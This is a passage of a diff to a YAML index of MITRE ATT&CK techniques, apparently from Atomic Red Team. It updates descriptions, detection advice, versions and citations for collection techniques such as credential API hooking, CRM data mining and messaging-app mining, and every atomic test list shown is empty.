       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -41002,13 +41553,13 @@ collection:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -41016,15 +41567,11 @@ collection:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -41035,9 +41582,60 @@ collection:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1213.004:
+    technique:
+      modified: '2024-10-17T14:36:24.983Z'
+      name: Customer Relationship Management Software
+      description: |-
+        Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+        Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+        CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Centre for Cybersecurity Belgium (CCB)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Logon Session: Logon Session Creation'
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+      created: '2024-07-01T20:06:13.664Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/004
+        external_id: T1213.004
+      - source_name: Bleeping Computer Bank Hack 2020
+        description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+          100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+      - source_name: Bleeping Computer Mint Mobile Hack 2021
+        description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+          after numbers ported, data accessed. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+      - source_name: Bleeping Computer US Cellular Hack 2022
+        description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+          after billing system hack. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -41083,7 +41681,7 @@ collection:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -41102,37 +41700,36 @@ collection:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.003:
     technique:
-      modified: '2022-10-18T22:44:01.723Z'
+      modified: '2024-09-04T13:03:54.101Z'
       name: Code Repositories
       description: |-
         Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
 
-        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
 
         **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Toby Kohlenberg
+      - Josh Liburdi, @jshlbrd
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor access to code repositories, especially performed
         by privileged users such as Active Directory Domain or Enterprise Administrators
         as these types of accounts should generally not be used to access code repositories.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user-based anomalies.
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Toby Kohlenberg
-      - Josh Liburdi, @jshlbrd
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -41155,41 +41752,52 @@ collection:
         url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213:
     technique:
-      modified: '2024-03-01T16:27:47.391Z'
+      modified: '2024-10-28T19:10:16.960Z'
       name: Data from Information Repositories
       description: "Adversaries may leverage information repositories to mine valuable
         information. Information repositories are tools that allow for storage of
         information, typically to facilitate collaboration or information sharing
         between users, and can store a wide variety of data that may aid adversaries
-        in further objectives, or direct access to the target information. Adversaries
-        may also abuse external sharing features to share sensitive documents with
-        recipients outside of the organization. \n\nThe following is a brief list
-        of example information that may hold potential value to an adversary and may
-        also be found on an information repository:\n\n* Policies, procedures, and
-        standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
-        Technical system documentation\n* Testing / development credentials\n* Work
-        / project schedules\n* Source code snippets\n* Links to network shares and
-        other internal resources\n\nInformation stored in a repository may vary based
-        on the specific instance or environment. Specific common information repositories
-        include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
-        and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
-        services such as Code Repositories, IaaS databases, enterprise databases,
-        and other storage infrastructure such as SQL Server."
+        in further objectives, such as Credential Access, Lateral Movement, or Defense
+        Evasion, or direct access to the target information. Adversaries may also
+        abuse external sharing features to share sensitive documents with recipients
+        outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+        \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on an information repository:\n\n*
+        Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+        System architecture diagrams\n* Technical system documentation\n* Testing
+        / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+        \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+        and other internal resources\n* Contact or other sensitive information about
+        business partners and customers, including personally identifiable information
+        (PII) \n\nInformation stored in a repository may vary based on the specific
+        instance or environment. Specific common information repositories include
+        the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+        and more specialized platforms such as customer relationship management (CRM)
+        databases \n* Collaboration platforms such as SharePoint, Confluence, and
+        code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+        \n\nIn some cases, information repositories have been improperly secured,
+        typically by unintentionally allowing for overly-broad access by all users
+        or even public access to unauthenticated users. This is particularly common
+        with cloud-native or cloud-hosted services, such as AWS Relational Database
+        Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+        Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Regina Elwell
       - Praetorian
       - Milos Stojadinovic
       - Isif Ibrahima, Mandiant
+      - Obsidian Security
+      - Naveen Vijayaraghavan
+      - Nilesh Dherange (Gurucul)
       x_mitre_deprecated: false
       x_mitre_detection: "As information repositories generally have a considerably
         large user base, detection of malicious use can be non-trivial. At minimum,
@@ -41218,10 +41826,9 @@ collection:
       - Windows
       - macOS
       - SaaS
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '3.3'
+      - Office Suite
+      x_mitre_version: '3.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -41234,10 +41841,20 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1213
         external_id: T1213
+      - source_name: Mitiga
+        description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+          I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+          Retrieved September 24, 2024.
+        url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
       - source_name: Atlassian Confluence Logging
         description: Atlassian. (2018, January 9). How to Enable User Access Logging.
           Retrieved April 4, 2018.
         url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      - source_name: TrendMicro Exposed Redis 2020
+        description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+          Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+          September 25, 2024.
+        url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
       - source_name: Microsoft SharePoint Logging
         description: Microsoft. (2017, July 19). Configure audit settings for a site
           collection. Retrieved April 4, 2018.
@@ -41246,11 +41863,14 @@ collection:
         description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
           8, 2021.
         url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+      - source_name: Cybernews Reuters Leak 2022
+        description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+          and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+        url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1602.001:
     technique:
@@ -41287,7 +41907,7 @@ collection:
         description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
           of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
           19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T01:54:22.812Z'
       name: SNMP (MIB Dump)
       description: "Adversaries may target the Management Information Base (MIB) to
         collect and/or mine valuable information in a network managed using Simple
@@ -41319,115 +41939,182 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-08-27T21:03:56.385Z'
+      name: 'Input Capture: Credential API Hooking'
+      description: |
+        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Metadata'
+      - 'Process: OS API Execution'
       type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
       created: '2020-02-11T19:01:15.930Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1056.004
         url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
       - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
         description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
           Retrieved December 18, 2017.
         url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Hook Overview
         description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
           December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
         description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
         description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
           12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
         description: Stack Exchange - Security. (2012, July 31). What are the methods
           to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
-      name: 'Input Capture: Credential API Hooking'
-      description: |
-        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
-        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
-        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
-        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1056.004
+    atomic_tests: []
+  T1213.005:
+    technique:
+      modified: '2024-10-16T14:22:49.146Z'
+      name: Messaging Applications
+      description: "Adversaries may leverage chat and messaging applications, such
+        as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+        \ \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on messaging applications: \n\n*
+        Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+        \n* Source code snippets \n* Links to network shares and other internal resources
+        \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+        about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+        2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+        messaging applications, adversaries may leverage data from chat messages in
+        order to improve their targeting - for example, by learning more about an
+        environment or evading ongoing incident response efforts.(Citation: Sentinel
+        Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: |-
-        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
-        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
-        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - Obsidian Security
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      - Office Suite
       x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
-      - 'Process: Process Metadata'
-      - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-      identifier: T1056.004
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+      created: '2024-08-30T13:50:42.023Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/005
+        external_id: T1213.005
+      - source_name: Sentinel Labs NullBulge 2024
+        description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+          as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+        url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+      - source_name: SC Magazine Ragnar Locker 2021
+        description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+          victims it can read the on-network incident response chat rooms. Retrieved
+          August 30, 2024.
+        url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+      - source_name: Guardian Grand Theft Auto Leak 2022
+        description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+          19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+          Retrieved August 30, 2024.'
+        url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+      - source_name: Microsoft DEV-0537
+        description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+          organizations for data exfiltration and destruction. Retrieved March 23,
+          2022.
+        url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
 lateral-movement:
   T1021.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:20:07.264Z'
       name: Remote Services:VNC
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
@@ -41438,6 +42125,7 @@ lateral-movement:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: lateral-movement
+      x_mitre_deprecated: false
